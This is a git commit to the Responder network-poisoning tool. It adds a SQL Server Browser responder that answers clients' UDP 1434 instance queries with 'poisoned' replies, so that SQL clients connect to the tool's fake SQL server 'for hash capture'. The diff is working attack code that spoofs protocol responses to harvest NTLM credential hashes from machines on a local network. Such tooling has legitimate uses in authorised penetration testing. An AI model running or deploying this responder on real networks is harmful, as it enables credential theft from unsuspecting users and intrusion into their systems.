Add Microsoft SQL Server Browser responder

When connecting to a named instance, a SQL client (at least SQL Server Native Client) will send a request (namely a CLNT_UCAST_INST message) to the server's SQL Server Browser service for instance connection information. If it gets no response, the connection attempt fails. By adding a SQL Server Browser responder for these requests, we ensure that connections are successfully made to the SQL Server responder for hash capture. As per the comment, this is based on the document "[MC-SQLR]: SQL Server Resolution Protocol", currently available at <https://msdn.microsoft.com/en-us/library/cc219703.aspx>.
2025-07-16 10:02:53 -07:00 · 2017-06-23 19:15:16 +12:00 · 2017-06-23 19:15:16 +12:00 · bff935e71e
commit bff935e71e
parent 38219e249e
2 changed files with 32 additions and 1 deletions
--- a/Responder.py
+++ b/Responder.py
@ -268,8 +268,9 @@ def main():
 			threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,)))

 		if settings.Config.SQL_On_Off:
-			from servers.MSSQL import MSSQL
+			from servers.MSSQL import MSSQL, MSSQLBrowser
 			threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,)))
+			threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 1434, MSSQLBrowser,)))

 		if settings.Config.FTP_On_Off:
 			from servers.FTP import FTP
--- a/servers/MSSQL.py
+++ b/servers/MSSQL.py
@ -17,6 +17,7 @@
 from SocketServer import BaseRequestHandler
 from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
 from utils import *
+import random
 import struct

 class TDS_Login_Packet:
@ -149,3 +150,32 @@ class MSSQL(BaseRequestHandler):
 		except:
 			self.request.close()
                        pass
+
+# MSSQL Server Browser class
+# See "[MC-SQLR]: SQL Server Resolution Protocol": https://msdn.microsoft.com/en-us/library/cc219703.aspx
+class MSSQLBrowser(BaseRequestHandler):
+	def handle(self):
+		if settings.Config.Verbose:
+			print text("[MSSQL-BROWSER] Received request from %s" % self.client_address[0])
+
+		data, soc = self.request
+
+		if data:
+			if data[0] in "\x02\x03": # CLNT_BCAST_EX / CLNT_UCAST_EX
+				self.send_response(soc, "MSSQLSERVER")
+			elif data[0] == "\x04": # CLNT_UCAST_INST
+				self.send_response(soc, data[1:].rstrip("\x00"))
+			elif data[0] == "\x0F": # CLNT_UCAST_DAC
+				self.send_dac_response(soc)
+
+	def send_response(self, soc, inst):
+		print text("[MSSQL-BROWSER] Sending poisoned response to %s" % self.client_address[0])
+
+		server_name = ''.join(chr(random.randint(ord('A'), ord('Z'))) for _ in range(random.randint(12, 20)))
+		resp = "ServerName;%s;InstanceName;%s;IsClustered;No;Version;12.00.4100.00;tcp;1433;;" % (server_name, inst)
+		soc.sendto(struct.pack("<BH", 0x05, len(resp)) + resp, self.client_address)
+
+	def send_dac_response(self, soc):
+		print text("[MSSQL-BROWSER] Sending poisoned DAC response to %s" % self.client_address[0])
+
+		soc.sendto(struct.pack("<BHBH", 0x05, 0x06, 0x01, 1433), self.client_address)